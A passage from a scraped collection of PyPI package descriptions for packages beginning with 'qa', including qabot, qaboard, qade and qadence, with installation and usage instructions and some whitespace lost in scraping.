visualize the tutorial notebooks, you can install the extra\ndependencies viapipfromPyPI:$pipinstallqaa[jupyter]UsagePlease see theCommand-line Referencefor details.ContributingContributions are very welcome.\nTo learn more, see theContributor Guide.LicenseDistributed under the terms of theBSD 3 Clause license,Quasi-Anharmonic Analysisis free and open source software.IssuesIf you encounter any problems,\npleasefile an issuealong with a detailed description.CreditsThis project was generated from@cjolowicz\u2019sHypermodern Python Cookiecuttertemplate."} +{"package": "qaamus", "pacakge-description": "UNKNOWN"} +{"package": "qa-analytics-insights", "pacakge-description": "OverviewThis repository hosts the source code for theQA Analytics Insightsproject,\na robust command-line interface (CLI) tool designed to generate data-driven\ninsights from QA (Quality Assurance) test results. Test results are typically\ngenerated in XML format by test automation frameworks such aspytestandunittest.FeaturesAnalyze test results in XML format.Generate visualizations and metrics to better understand test performance.Create actionable insights to improve QA processes.Command line toolThe command line tool can be used to generate insights from the tests results\nin xml format.The tool can be used as follows:$ qa-analytics-insights --help\nUsage: qa-analytics-insights -f [-o ] [-vv] [-h] [-v]The tool accepts the following arguments:-for\u2013file: Path to the file containing the tests results in xml format.-oor\u2013output: Path to the directory where the insights will be generated.-vvor\u2013verbose: Enable verbose mode.-vor\u2013version: Show version and exit.-hor\u2013help: Show help message and exit.LibraryThe library can be used to generate insights from the tests result in xml\nformat.The library can be used as follows:from qa_analytics_insights.result_analyzer import ResultAnalyzer\nanalyzer = ResultAnalyzer(\n test_results_file_path='path/to/test/results/file.xml',\n output_dir='path/to/output/dir',\n)InstallationTo install the package frompypi, run the following command:$ pip install qa-analytics-insightsDevelopmentTo install the package in development mode, run the following command:# create a virtual environment\n$ virtualenv -p python3 venv\n\n# activate the virtual environment\n$ source venv/bin/activate\n\n# Run the package in development mode\n$ hatch run develop:allFor linting, run the following command:$ hatch run linter:linterfor building the package, run the following command:$ hatch buildfor generating the documentation, run the following command:$ hatch run docs:allfor running the tests with coverage, run the following command:$ hatch run default:all"} +{"package": "qa-annotator", "pacakge-description": "QA-Annotator: Annotation Is All You NeedAbout The ProjectMaking the mammoth task of data annotation for an NLP-based Question-Answering system hassle-free. Just jump right in and start annotating!Getting StartedInstallationInstall with pip (python 3 required)$pipinstallQA-AnnotatorStart the server$annotatorContributingContributions, suggestions are welcomed! :)If you like the project, Don't forget to give a star! Thanks!LicenseDistributed under the MIT License. SeeLICENSE.txtfor more information.ContactPrateek Yadav -@impyadav_LinksProject Link:https://pypi.org/project/QA-Annotator/"} +{"package": "qabal", "pacakge-description": "Qabal is a simple and fast open source content-based message broker. Use\nQabal to organize all your multi-stage analytical workloads.Qabal has no install dependencies outside of the default Python runtime.\nUse it on your Raspberry Pi, laptop, or 100 node Dask cluster. Routing\ndecisions in Qabal take constant time, so you can use it for complex\nmultistage analytics with thousands of steps. It\u2019s lightweight, simple\nto understand, easy to integrate with distributed task libraries (eg.\nDask) and fast to execute. It has configurable full pipeline data\nprovenance. In extended provenance mode, Qabal records when every data\nitem is added or updated by what analytic and at what time.Qabal analytics need not be aware that they are part of a message broker\npipeline. They don\u2019t need to depend or import any Qabal library. The\ndata structure used in routing extends the standard Python dictionary.\nQabal comes with ready to use reflection-based content injection, giving\nusers flexibility on the API of their analytics.Installationpip install qabalTry It For YourselfQabal has a simple API that revolves around attaching functions to a\nSession object.You define routes in Qabal using a query DSL that resembles Python\nconditional statements. These get \u201ccompiled\u201d into more traditional\nmessage broker routes.fromqabalimportSession,Itemdeffoo(item):item['foo']='foo'returnitemdefbar(item):item['bar']='bar'returnitemdefbaz(item):item['baz']='baz'returnitemdefbar_baz(item):item['bar']='bar!'item['baz']='baz!'returnitemdefparameters_are_okay_too(foo,bar):return{'baz':foo+bar}# If your trigger query doesn't use the Qabal query language, an analytic need not even depend on Qabal.classAnalyticWithMetadata:__trigger__=Item['baz']=='baz!'__inject__=True__creates__='qux'def__call__(self,baz):returnbaz+'?'example=AnalyticWithMetadata()# Despite all the Qabal metadata, this analytic still maintains a normal API.print(example('hello'))# Outputs: 'hello?'sess=Session(provenance='extended')# Qabal records a ton of information in this mode.sess.add(foo,Item['type']=='foo')sess.add(bar,Item['foo']=='foo')res=sess.feed({'type':'foo'})print(res)print(res.provenance)# The session is mutable at any time.handle=sess.add(bar_baz,Item['bar']=='bar')res=sess.feed({'type':'foo'})sess.remove(handle)print(res)sess.add(bar_baz,Item['bar']=='bar')# Analytics with metadata don't need a routesess.add(example)res=sess.feed({'type':'foo'})print(res)"} +{"package": "qab-core", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qablet", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qablet-basic", "pacakge-description": "No description available on PyPI."} +{"package": "qablet-contracts", "pacakge-description": "qablet_contractsQablet Contracts documentation is atqablet.github.io/qablet-contracts.A Qablet timetable defines a financial product using a sequence of payments, choices and conditions. A valuation model implemented with a Qablet parser can value any contract, as long as the contract can be described using a Qablet Timetable.This repositary contains code to create qablet timetables.\nIt does not contain models that price qablet timetables. Such models will be available in other independent projects.Install it from PyPIpipinstallqablet_contracts"} +{"package": "qaboard", "pacakge-description": "Experiment tracking framework with advanced viewers.Helps algo/ml/perf engineers share results, collaborate, and build better products.FeaturesOrganize, View and Compare Results,Tuning/OptimizationWeb-based,with sharable URLs.Visualizations:support for quantitative metrics, and many file formats: advanced image viewer, support for videos, plotly graphs, flame graphs, text, pointclouds, HTML...Integrations:direct access from Git and CI tools, easily exportable results, API, links to the code, trigger gitlabCI/jenkins/webhooks...Agnosticto your language/framework: run your existing code, write files, view them.For screenshots checkour website.BenefitsQA-Board across many projects enables us to:Scale R&D:enable engineers to achieve more and be more productive.Faster Time-to-Market:collaboration across teams, workflow integration..Quality:uncover issues earlier, KPIs, tuning, reporting...Getting StartedRead the docs!You will learn how to:Start a QA-Board serverWrap your code with QA-BoardView output files and KPIs...and setup parameter tuning, integrations with 3rd party tools, etc.If you want to learn about the code's organization, or how to contribute, readCONTRIBUTING.mdFeedback? Questions? Need Help? Found a bug?Don't hesitate to get in touch! Contactarthur.flam@samsung.com, we'll be delighted to hear your insights.If you've got questions about setup, deploying, want to develop new features, or just want to chat with the developers, please feel free tostart a thread in our Spectrum community!Found a bug with QA-Board? Go ahead andsubmit an issue. And, of course, feel free to submit pull requests with bug fixes or changes to themasterbranch.ContributorsQA-Board was started atSamsung SIRCbyArthur Flam.Thanks to the following people for their contributions, testing, feedback or bug reports: Amir Fruchtman, Avi Schori, Yochay Doutsh, Itamar Persi, Amichay Amitay, Lena Grechikhin, Shai Shamir, Matan Danino, Roy Shaul, Gal Hai, Rivka Emanuel, Ela Shahar, Nadav Ofer, David Nukrai. Thanks also to Sebastien Derhy, Elad Rozin, Nathan Levy, Shahaf Duenyas, Yotam Ater, Asaf Jazcilevich and Yoel Yaffe for supporting the project.You don't see your name? Get in touch to be added to the list!CreditsThe logo is a the Poodletwemoji\ud83d\udc29, recolored in Samsung Blue \ud83d\udd35.Copyright 2019 Twitter, Inc and other contributors. Code licensed under theMIT License. Graphics licensed underCC-BY 4.0"} +{"package": "qabot", "pacakge-description": "qabotQuery local or remote files with natural language queries powered by\nOpenAI'sgptandduckdb\ud83e\udd86.Can query Wikidata, local and remote files.InstallationInstall withpipx:pipx install qabotCommand Line Usage$EXPORTOPENAI_API_KEY=sk-...\n$EXPORTQABOT_MODEL_NAME=gpt-4\n$qabot-w-q\"How many Hospitals are there located in Beijing\"Query:HowmanyHospitalsaretherelocatedinBeijing\nThereare39hospitalslocatedinBeijing.\nTotaltokens1749approximatecostinUSD:0.05562Python Usagefromqabotimportask_wikidata,ask_fileprint(ask_wikidata(\"How many hospitals are there in New Zealand?\"))print(ask_file(\"How many men were aboard the titanic?\",'data/titanic.csv'))Output:There are 54 hospitals in New Zealand.\nThere were 577 male passengers on the Titanic.FeaturesWorks on local CSV files:remote CSV files:$ qabot -f https://duckdb.org/data/holdings.csv -q \"Tell me how many Apple holdings I currently have\"\n \ud83e\udd86 Creating local DuckDB database...\n \ud83e\udd86 Loading data...\ncreate view 'holdings' as select * from 'https://duckdb.org/data/holdings.csv';\n \ud83d\ude80 Sending query to LLM\n \ud83e\uddd1 Tell me how many Apple holdings I currently have\n\n\n \ud83e\udd16 You currently have 32.23 shares of Apple.\n\n\nThis information was obtained by summing up all the Apple ('APPL') shares in the holdings table.\n\nSELECT SUM(shares) as total_shares FROM holdings WHERE ticker = 'APPL'Even on (public) data stored in S3:You can even load data from disk/URL via the natural language query:Load the file 'data/titanic.csv' into a table called 'raw_passengers'.\nCreate a view of the raw passengers table for just the male passengers. What\nwas the average fare for surviving male passengers?~/Dev/qabot> qabot -q \"Load the file 'data/titanic.csv' into a table called 'raw_passengers'. Create a view of the raw passengers table for just the male passengers. What was the average fare for surviving male passengers?\" -v\n \ud83e\udd86 Creating local DuckDB database...\n \ud83e\udd16 Using model: gpt-4-1106-preview. Max LLM/function iterations before answer 20\n \ud83d\ude80 Sending query to LLM\n \ud83e\uddd1 Load the file 'data/titanic.csv' into a table called 'raw_passengers'. Create a view of the raw passengers table for just the male passengers. What was the \naverage fare for surviving male passengers?\n \ud83e\udd16 load_data\n{'files': ['data/titanic.csv']}\n \ud83e\udd86 Imported with SQL:\n[\"create table 'titanic' as select * from 'data/titanic.csv';\"]\n \ud83e\udd16 execute_sql\n{'query': \"CREATE VIEW male_passengers AS SELECT * FROM titanic WHERE Sex = 'male';\"}\n \ud83e\udd86 No output\n \ud83e\udd16 execute_sql\n{'query': 'SELECT AVG(Fare) as average_fare FROM male_passengers WHERE Survived = 1;'}\n \ud83e\udd86 average_fare\n40.82148440366974\n \ud83e\udd86 {\"summary\": \"The average fare for surviving male passengers was approximately $40.82.\", \"detail\": \"The average fare for surviving male passengers was\ncalculated by creating a view called `male_passengers` to filter only the male passengers from the `titanic` table, and then running a query to calculate the \naverage fare for male passengers who survived. The calculated average fare is approximately $40.82.\", \"query\": \"CREATE VIEW male_passengers AS SELECT * FROM \ntitanic WHERE Sex = 'male';\\nSELECT AVG(Fare) as average_fare FROM male_passengers WHERE Survived = 1;\"}\n\n\n \ud83d\ude80 Question:\n \ud83e\uddd1 Load the file 'data/titanic.csv' into a table called 'raw_passengers'. Create a view of the raw passengers table for just the male passengers. What was the \naverage fare for surviving male passengers?\n \ud83e\udd16 The average fare for surviving male passengers was approximately $40.82.\n\n\nThe average fare for surviving male passengers was calculated by creating a view called `male_passengers` to filter only the male passengers from the `titanic` \ntable, and then running a query to calculate the average fare for male passengers who survived. The calculated average fare is approximately $40.82.\n\nCREATE VIEW male_passengers AS SELECT * FROM titanic WHERE Sex = 'male';\nSELECT AVG(Fare) as average_fare FROM male_passengers WHERE Survived = 1;QuickstartYou need to set theOPENAI_API_KEYenvironment variable to your OpenAI API key,\nwhich you can get fromhere.Install theqabotcommand line tool using pip/pipx:$pipinstall-UqabotThen run theqabotcommand with either local files (-f my-file.csv) or-wto query wikidata.ExamplesLocal CSV file/s$qabot-q\"how many passengers survived by gender?\"-fdata/titanic.csv\n\ud83e\udd86Loadingdatafromfiles...\nLoadingdata/titanic.csvintotabletitanic...\n\nQuery:howmanypassengerssurvivedbygender?\nResult:\nTherewere233femalepassengersand109malepassengerswhosurvived.\ud83d\ude80anyfurtherquestions?[y/n](y):y\ud83d\ude80Query:whatwasthelargestfamilywhodidnotsurvive?Query:whatwasthelargestfamilywhodidnotsurvive?\nResult:\nThelargestfamilywhodidnotsurvivewastheSagefamily,with8members.\ud83d\ude80anyfurtherquestions?[y/n](y):nQuery WikiDataUse the-wflag to query wikidata. For best results use agpt-4or similar model.$EXPORTQABOT_MODEL_NAME=gpt-4\n$qabot-w-q\"How many Hospitals are there located in Beijing\"Intermediate steps and database queriesUse the-vflag to see the intermediate steps and database queries.\nSometimes it takes a long route to get to the answer, but it's interesting to see how it gets there.qabot -f data/titanic.csv -q \"how many passengers survived by gender?\" -vData accessed via http/s3Use the-f flag to load data from a url, e.g. a csv file on s3:$qabot-fs3://covid19-lake/enigma-jhu-timeseries/csv/jhu_csse_covid_19_timeseries_merged.csv-q\"how many confirmed cases of covid are there?\"-v\n\ud83e\udd86Loadingdatafromfiles...\ncreatetablejhu_csse_covid_19_timeseries_mergedasselect*from's3://covid19-lake/enigma-jhu-timeseries/csv/jhu_csse_covid_19_timeseries_merged.csv';Result:264308334confirmedcasesIdeasstreaming mode to output results as they come intoken limitsSupervisor agent - assess whether a query is \"safe\" to run, could ask for user confirmation to run anything that gets flagged.Often we can zero-shot the question and get a single query out - perhaps we try this before the MKL chaintest each zeroshot agent individuallyGenerate and pass back assumptions made to the userAdd an optional \"clarify\" tool to the chain that asks the user to clarify the questionCreate a query checker tool that checks if the query looks valid and/or safeInject AWS credentials into duckdb so we can access private resources in S3Automatic publishing to pypi. Look athttps://blog.pypi.org/posts/2023-04-20-introducing-trusted-publishers/"} +{"package": "qacaller", "pacakge-description": "params ,metrics, log"} +{"package": "qackorm", "pacakge-description": "QUANTAXIS Financial Framework"} +{"package": "qacode", "pacakge-description": "BranchLinux DeployWindows DeployCircleCI - DockerCodeClimatemasterPython tested versions3.73.63.5<=3.4SupportedSupportedSupportedNot SupportedHow to install ?Install from PIP :pip install qacodeInstall from setup.py file :python setup.py installDocumentationHow to use library, searching forUsage Guideor auto updatedQAcode\u2019s Documentation.https://netzulo.github.io/How to exec tests ?Tests from setup.py file :python setup.py testInstall from PIP file :pip install toxTests from tox :tox-l&& tox-eTOX_ENV_NAME(see tox.ini file to get environment names)TOX Env nameEnv descriptionpy35,py36,py37Python supported versionsflake8Exec linter in qalab/ tests/coverageGenerate XML and HTML reportsdocsGenerate doc HTML in /docsConfiguration File{\n \"bot\": {\n \"log_output_file\": \"logs/\",\n \"log_name\": \"qacode\",\n \"log_level\": \"DEBUG\",\n \"mode\": \"remote\",\n \"browser\": \"chrome\",\n \"options\": { \"headless\": false },\n \"url_hub\": \"http://localhost:11000/wd/hub\",\n \"drivers_path\": \"../qadrivers\",\n \"drivers_names\": [\n \"chromedriver_32.exe\",\n \"chromedriver_64.exe\",\n \"chromedriver_32\",\n \"chromedriver_64\",\n \"firefoxdriver_32.exe\",\n \"firefoxdriver_64.exe\",\n \"firefoxdriver_64.exe\",\n \"firefoxdriver_32\",\n \"phantomjsdriver_32.exe\",\n \"phantomjsdriver_64.exe\",\n \"phantomjsdriver_32\",\n \"phantomjsdriver_64\",\n \"iexplorerdriver_32.exe\",\n \"iexplorerdriver_64.exe\",\n \"edgedriver_32.exe\",\n \"edgedriver_64.exe\"\n ]\n }\n}Getting StartedJust starting example of usage before readUsage Guide(or refer to `QAcode\u2019s Documentation`_).fromqacode.core.bots.bot_baseimportBotBasefromqacode.core.webs.controls.control_baseimportControlBasefromqacode.utilsimportsettingsSETTINGS=settings(file_path=\"/home/user/config/dir/\",file_name=\"settings.json\")try:bot=BotBase(**SETTINGS)bot.navigation.get_url(\"http://the-internet.herokuapp.com/login\")ctl_config={\"selector\":\"input[name='username']\"}ctl=ControlBase(bot,**ctl_config)# ENDimportpdb;pdb.set_trace()# TODO, remove DEBUG laneprint(ctl)exceptExceptionaserr:print(\"ERROR:{}\".format(err))finally:bot.close()"} +{"package": "qaczar", "pacakge-description": "No description available on PyPI."} +{"package": "qadabra", "pacakge-description": "Qadabra:QuantitativeAnalysis ofDifferentialAbundanceRanks(Pronouncedka-da-bra)Qadabra is a Snakemake workflow for running and comparing several differential abundance (DA) methods on the same microbiome dataset.Importantly, Qadabra focuses on both FDR corrected p-valuesandfeature ranksand generates visualizations of differential abundance results.Please note this software is currently a work in progress. Your patience is appreciated as we continue to develop and enhance its features. Please leave an issue on GitHub should you run into any errors.InstallationOption 1: Pip install fromPyPIpip install qadabraQadabra requires the following dependencies:snakemakeclickbiom-formatpandasnumpycythoniowCheck out thetutorialfor more in-depth instructions on installation.Option 2: Install from source (this GitHub repository)PrerequisitesBefore you begin, ensure you have Git and the necessary build tools installed on your system.Clone the Repositorygit clone https://github.com/biocore/qadabra.gitNavigate to repo root directory where thesetup.pyfile is located and then install QADABRA in editable modecd qadabra\npip install -e .Usage1. Creating the workflow directoryQadabra can be used on multiple datasets at once.\nFirst, we want to create the workflow directory to perform differential abundance with all methods:qadabra create-workflow --workflow-dest This command will initialize the workflow, but we still need to point to our dataset(s) of interest.2. Adding a datasetWe can add datasets one-by-one with theadd-datasetcommand:qadabra add-dataset \\\n --workflow-dest \\\n --table /data/table.biom \\\n --metadata /data/metadata.tsv \\\n --tree /data/my_tree.nwk \\\n --name my_dataset \\\n --factor-name case_control \\\n --target-level case \\\n --reference-level control \\\n --confounder confounding_variable(s) \\\n --verboseLet's walkthrough the arguments provided here, which represent the inputs to Qadabra:workflow-dest: The location of the workflow that we created earliertable: Feature table (features by samples) inBIOMformatmetadata: Sample metadata in TSV formattree: Phylogenetic tree in .nwk or other tree format (optional)name: Name to give this datasetfactor-name: Metadata column to use for differential abundancetarget-level: The value in the chosen factor to use as the targetreference-level: The reference level to which we want to compare our targetconfounder: Any confounding variable metadata columns (optional)verbose: Flag to show all preprocessing performed by QadabraYour dataset should now be added as a line inmy_qadabra/config/datasets.tsv.You can useqadabra add-dataset --helpfor more details.\nTo add another dataset, just run this command again with the new dataset information.3. Running the workflowThe previous commands will create a subdirectory,my_qadabrain which the workflow structure is contained.\nFrom the command line, execute the following to start the workflow:snakemake --use-conda --cores Please read theSnakemake documentationfor how to run Snakemake best on your system.When this process is completed, you should have directoriesfigures,results, andlog.\nEach of these directories will have a separate folder for each dataset you added.4. Generating a reportAfter Qadabra has finished running, you can generate a Snakemake report of the workflow with the following command:snakemake --report report.zipThis will create a zipped directory containing the report.\nUnzip this file and open thereport.htmlfile to view the report containing results and visualizations in your browser.TutorialSee thetutorialpage for a walkthrough on using Qadabra workflow with a microbiome dataset.FAQsComing soon: AnFAQspage of commonly asked question on the statistics and code pertaining to Qadabra.CitationThe manuscript for Qadabra is currently in progress. Please cite this GitHub page if Qadabra is used for your analysis. This project is licensed under the BSD-3 License. See thelicensefile for details."} +{"package": "qad-api", "pacakge-description": "The QAD-API Python libraryThe QAD-API Python library is a library for accessing the (REST) API ofQAD Cloud.NoteAs this library serves simply as a Python front-end to the QAD Cloud,\nyou will first need an account on this platform, before using the library.InstallationWe do not yet provide a PyPi package. The recommended method for installing\nQAD-API is to clone the following repository, and then \"pip install\" it\nfrom the appropriate local folder:gitclonehttps://github.com/HQSquantumsimulations/qad-api.git\npipinstall-eqad-apiUsageThe QAD-API is utilized by importing the classQAD_APIfrom the root packageqad_api. In order access the API, one must create an instance of this class.To learn more about the API functionality, please refer to thedocumentation of QAD_API.ExampleTo get started with the QAD_API, we provide a quick and simple example here.\nYou also find this example in the folderexamples/lattice.We will create an instance ofQAD_API, which will authenticate the user\nwith the back-end. The first time this is done, the user will be asked\nto open a link in a browser and use their credentials to authenticate\nwith the back-end (OAuth2).After this, we use the instance ofQAD_APIto access the API functionality.\nWe create a unit-cell and a system for the lattice-based problem solver \"SCCE,\"\nand also create a job for that solver by passing the recently created handlers,\nthen wait for the job to finish. This will take some time, after which we\ndownload the results file to the local file system.fromqad_apiimportQAD_API# Creating an QAD_API instance will authenticate the user with the backendqad=QAD_API()# Create a unit-cellunit_cell=qad.lattice.unit_cells.create('1D XXZ',{\"unitcell\":{\"atoms\":[# eps U['0','A',[0,0,0],0.0001,0.0],['1','B',[0.5,0,0],-0.0001,0.0]],\"bonds\":[# t U['0','0',[1,0,0],-1.0,0.0]],\"lattice_vectors\":[[1,0,0]]}})print(f\"Unit cell created:{unit_cell.id}\")# Create a systemsystem=qad.lattice.systems.create('1D XXZ',{\"system\":{\"cluster_size\":[14,1,1],# measured in unit cells\"system_size\":[2,1,1],# measured in clusters\"cluster_offset\":[0,0,0],# measured in clusters\"system_boundary_condition\":\"periodic\"}})print(f\"System created:{system.id}\")# Create a job (will start to run it automatically)job=qad.lattice.scce.jobs.create('1D XXZ',unit_cell,system)print(f\"Job created:{job.id}\")# Wait for the job to be done (when using co-routines: await job.wait())job.wait_blocking()# Download the result to a local filejob.download_result(f\"./{job.id}.h5\")print(\"Downloaded result\")"} +{"package": "qa-data-manager", "pacakge-description": "\u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u0442\u0435\u0441\u0442\u043e\u0432"} +{"package": "qadbengine", "pacakge-description": "QUANTAXIS Financial Framework"} +{"package": "qade", "pacakge-description": "Adifferential equationsolver usingquantum annealing. It can be applied to coupled linear ODEs and PDEs with variable coefficients and inhomogeneous terms. The solution is obtained by finding the optimal weights for a linear combination of \"basis functions\":The problem can then be viewed as a minimization one, for the loss functionwhere E is the equation to be solved, B are the initial/boundary conditions, and the x are the sample points at which they must hold. From this perspective, there is no difference between the equation and the boundary conditions, and they are treated on an equal footing. The loss function is then translated into anIsing modelHamiltonian by means of abinary encodingfor the weights and solved in a quantum annealer.Solutions obtained with qade for the wave equation and a system of coupled first order ODEs (see theexamplesdirectory):ContentsInstallationUsage exampleDocumentationqade.functionqade.basisqade.equationqade.solveInspecting the loss functionCitationInstallation> pip install qadeThis will install the dependenciesnumpyanddwave-ocean-sdkif not present. Python version 3.7 or higher is required. In order forqadeto send the problem for solution in the D-Wave systems, theAPI tokenneeds to beconfigured.Usage exampleAs an example, we can solve the Laguerre equation in the[0, 1]interval with boundary conditions at the extremes:whereL_nis the nth Laguerre polynomial. To do so, we parametrize the solution as a linear combination of the first few powers of x, and look for the optimal values of the weights such that the equation is satisfied at a set of sample points. This can be done through:importnumpyasnpfromscipy.specialimporteval_laguerreasLimportqaden=4# Laguerre equation parameterx=np.linspace(0,1,20)# Sample points at which the equation is to be evaluatedy=qade.function(n_in=1,n_out=1)# Define the function to be solved for# Define the equation and boundary conditionseq=qade.equation(x*y[2]+(1-x)*y[1]+n*y[0],x)bcs=qade.equation(y[0]-[1,L(n,1)],[0,1])# Solve the equation using as the basis of functions the monomials [1, x, x^2, x^3]y_sol=qade.solve([eq,bcs],qade.basis(\"monomial\",4),scales=(n-2),num_reads=500)This illustrates the use of the 4 main functions provided by qade:qade.function(n_in, n_out)defines a symbolic functionyofn_ininputs andn_outoutputs, whose nth derivative is denoted asy[n].qade.equation(eq, samples)defines an equation of the formeq == 0, withsamplesbeing an array-like object containing sample points at which it holds.qade.basis(name, size_per_dim, ...)defines the basis of functions in terms of which the solution will be written.qade.solve(eqs, basis, ...)uses a binary encoding to represent the problem of solving the given equations in the given basis as an Ising model, sends it to a D-Wave quantum annealer, and collects it into aSolutionobjecty_sol.We can now print the weights of the basis functions in the solution and the corresponding through:print(f\"loss ={y_sol.loss:.3}, weights ={y_sol.weights}\")We can also evaluate the solution at any set of points, plot the results, and compare to the analyical solution, the which is nth Laguerre polynomial:importmatplotlib.pyplotaspltplt.plot(x,y_sol(x),linewidth=5)plt.plot(x,L(n,x),color=\"black\",linestyle=\"dashed\")plt.show()For other examples, see theexamplesdirectory. An example PDE, the wave equation, is solved inwave.py. A system of coupled first-order ODEs is solved incoupled.py.Documentationqade.functionCreatesFunctionobjects, to be used in definition of the equations. The arguments are:n_in: int. The number of input variables of the function, i.e. the dimension of the domain.n_out: int. The number of output variables of the function, i.e. the dimension of the target space. Forn_out == 1,qade.functionreturns a singleFunction. Forn_out > 1, it returns list ofFunctionobjects, one for each output component.A differential equation or boundary condition is then defined as a linear combination of the derivatives of the functions, plus possible an inhomogeneous term, with coefficients and inhomogeneous term being either scalars or flat array-like objects (numpy arrays, lists, ...) having the same length as the set of sample points at which the equation is evaluated. The examples show how this is done in different practical settings. The notationf[k1, ..., kn]represents the following expression:qade.equationCreates anEquation, representing any linear differential equation or boundary condition. The arguments are:formula. The expression for the equation, constructed as a linear combination of derivativesf[k1, ..., kn]ofFunctionobjects, plus the optional inhomogeneous term.samples, an array-like object of shape(n_samples, n_in)(or just(n_samples,), ifn_in == 1). Defines the sample points from the domain in which the equation must hold.qade.basisCreates aBasis, representing the functions to be linearly combined into the solution. The arguments are:name: str. The allowed names are:\"fourier\". A product of the following functions for each componentxin the input space:\"monomial\". A product of the following functions for each componentxin the input space:\"trig\". A product of the following functions for each componentxin the input space:\"gaussian\". The following functions of the distancerto each pointx_nin an equally-spaced grid in the input space (which is assumed to be the box[0, 1]^n_in):\"multiquadric\". The following functions of the distancerto each pointx_nin an equally-spaced grid in the input space (which is assumed to be the box[0, 1]^n_in):size_per_dim: int. The number of functions to use per input variable. The total dimension of the basis will besize_per_dim ** n_in.n_in: int. Only used by the radial basis functions\"gaussian\"and\"multiquadric\"to create the grid of points in the domain.scale: float. The lambda scale parameter of the radial basis functions\"gaussian\"and\"multiquadric\".Custom basesCustom bases can be provided by the user. In this case, instead of usingqade.basis, the user should define a class implementing the methods:dimension(self, n_in: int) -> int. Returning the total number of functions in the basis.derivatives(self, k: int, samples: np.ndarray) -> np.ndarray. Returning the array of kth derivatives of the basis functions at the given sample points, received as an array of shape(n_samples, n_in). The output array should have shape:(n_samples, n_out) + (n_in,) * k.qade.solveSolves the given equations and returns aSolutionobject. The arguments are:equations: List[Equation]. The equations to be solved, including initial/boundary conditions.basis: Basis. The basis to be used in their solution.n_spins: int = 3. The number of spins per weight in the binary encoding.n_epochs: int = 10. The number of epochs in which the problem is solved, using the values obtained in the previous epoch as the center values in the binary encoding of the weights.scale_factor: float = 0.5. The relative change in the scale in the binary encoding of the weights from one epoch to the next.anneal_schedule: Optional[List[Tuple[int, int]]] = None. The schedule to be used by the quantum annealer. See D-Wave Ocean Tools'documentationfor details. IfNone, it will default to a linear schedule of the form[(0, 0), (200, 0)].num_reads: int = 200. The number of reads to be performed by the quantum annealer.qpu_solver: str = \"Advantage_system4.1\". The QPU to be used.centers: ArrayLike = 0. The initial central values in the binary encoding of the weights. Must be a scalar or an array of sizen_out * basis_dim.scales: ArrayLike = 1. The initial scales in the binary encoding of the weights. Must be a scalar or an array of sizen_out * basis_dim.verbose: bool = False. Determines if information about intermediate steps should be printed.classical_minimizer: Optional[Callable[[Callable[[np.ndarray], float]], np.ndarray]] = None. If notNone, a classical function to be used in place of the quantum procedure for minimizing the loss function, for testing purposes.Solution objectsReturn type ofqade.solve. They are callables that receive an array-like object of sample points, with shape(n_samples, n_in)(or just(n_samples,), ifn_in == 1), and return the corresponding values of the solution, as a numpy array of shape(n_samples, n_out). Their attributes are:basis: Basis. The basis in terms of which the solution has been obtained.weights: np.ndarray, with shape(n_out, n_in). The optimal weights providing the solution as a linear combination of the basis functions.loss: float. The value of the loss function at the given weights.Inspecting the loss functionTwo functions are provided to obtain the internal parameters of the loss function, both as a quadratic function of the real-valued weights, and as an Ising model Hamiltonian in the annealer spins.qade.lossReturns the(J, h)parameters of the quadratic loss functionQ(w) = w^T J w + h^T w, wherewis the flattened array of the continuous weights. The arguments areequations: List[Equation]. The equations to be included.basis: Basis. The basis to be used in their solution.qade.isingReturns the(J, h)parameters of the Ising model HamiltonianH(w) = w^T J w + h^T w, wherewis the flattened array of spins. The arguments are:equations: List[Equation]. The equations to be included.basis: Basis. The basis to be used in their solution.n_spins: int = 3. The number of spins per weight in the binary encoding.centers: ArrayLike = 0. The initial central values in the binary encoding of the weights. Must be a scalar or an array of sizen_out * basis_dim.scales: ArrayLike = 1. The initial scales in the binary encoding of the weights. Must be a scalar or an array of sizen_out * basis_dim.CitationIf you use qade, please cite:"} +{"package": "qadeepdf", "pacakge-description": "This is a decscription files that is use for install the package"} +{"package": "qadeeraaa", "pacakge-description": "this is a demo\npls don\u2019t download"} +{"package": "qadeerpackage", "pacakge-description": "this is a demo\npls don\u2019t download"} +{"package": "qadeerpackages", "pacakge-description": "this is a demo\npls don\u2019t download"} +{"package": "qadeerpdf", "pacakge-description": "this is a demo\npls don\u2019t download"} +{"package": "qadence", "pacakge-description": "For a high-level overview of Qadence features,check out our white paper.For more detailed information,check out the documentation.Qadenceis a Python package that provides a simple interface to builddigital-analog quantum\nprogramswith tunable qubit interaction defined onarbitrary register topologiesrealizable on neutral atom devices.Feature highlightsAblock-based systemfor composingcomplex digital-analog\nprogramsin a flexible and scalable manner, inspired by the Julia quantum SDKYao.jland functional programming concepts.Asimple interfaceto work withinteracting neutral-atom qubit systemsusingarbitrary registers topologies.An intuitiveexpression-based systemdeveloped on top of the symbolic librarySympyto constructparametric quantum programseasily.High-order generalized parameter shift rulesfordifferentiating parametrized quantum operations.Out-of-the-boxautomatic differentiabilityof quantum programs withPyTorchintegration.Efficient executionon a variety of different purpose backends: from state vector simulators to tensor network emulators and real devices.Installation guideQadence is available onPyPIand can be installed usingpipas follows:pipinstallqadenceThe default, pre-installed backend for Qadence isPyQTorch, a differentiable state vector simulator for digital-analog simulation based onPyTorch. It is possible to install additional,PyTorch-based backends and the circuit visualization library using the following extras:pulser: ThePulserbackend for composing, simulating and executing pulse sequences for neutral-atom quantum devices.braket: TheBraketbackend, an open source library that provides a framework for interacting with quantum computing hardware devices through Amazon Braket.visualization: A visualization library to display quantum circuit diagrams.Qadence also supports aJAXengine which is currently supporting theHorqruxbackend.horqruxis currently only available via thelow-level API.To install individual extras, use the following syntax (IMPORTANTMake sure to use quotes):pipinstall\"qadence[braket,pulser,visualization]\"To install all available extras, simply do:pipinstall\"qadence[all]\"IMPORTANTBefore installingqadencewith thevisualizationextra, make sure to install thegraphvizpackage\non your system:# For Debian-based distributions (e.g. Debian, Ubuntu)sudoaptinstallgraphviz# on MacOSbrewinstallgraphviz# via condacondainstallpython-graphvizContributingBefore making a contribution, please review ourcode of conduct.Submitting Issues:To submit bug reports or feature requests, please use 